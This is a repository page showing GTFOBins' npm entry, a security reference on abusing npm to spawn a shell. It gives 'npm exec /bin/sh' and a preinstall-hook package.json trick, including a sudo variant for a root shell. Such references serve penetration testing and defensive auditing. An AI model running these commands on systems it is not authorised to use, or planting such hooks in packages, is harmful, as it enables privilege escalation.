This website requires JavaScript.
Explore
Help
Sign In
dash
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
Code
Issues
Pull Requests
Packages
Projects
Releases
Wiki
Activity
Files
390c49394a972fac96ed3475d0fe36bf52eaa266
GTFOBins.github.io
/
_gtfobins
/
npm.md
Andrea Cardaci
3466212c5d
Update yarn and npm
2021-06-18 14:16:48 +02:00
348 B
Raw
Blame
History
functions
functions
shell
sudo
code
npm exec /bin/sh
code
TF=$(mktemp -d) echo '{"scripts": {"preinstall": "/bin/sh"}}' > $TF/package.json npm -C $TF i
code
TF=$(mktemp -d) echo '{"scripts": {"preinstall": "/bin/sh"}}' > $TF/package.json sudo npm -C $TF --unsafe-perm i
Reference in New Issue
View Git Blame
Copy Permalink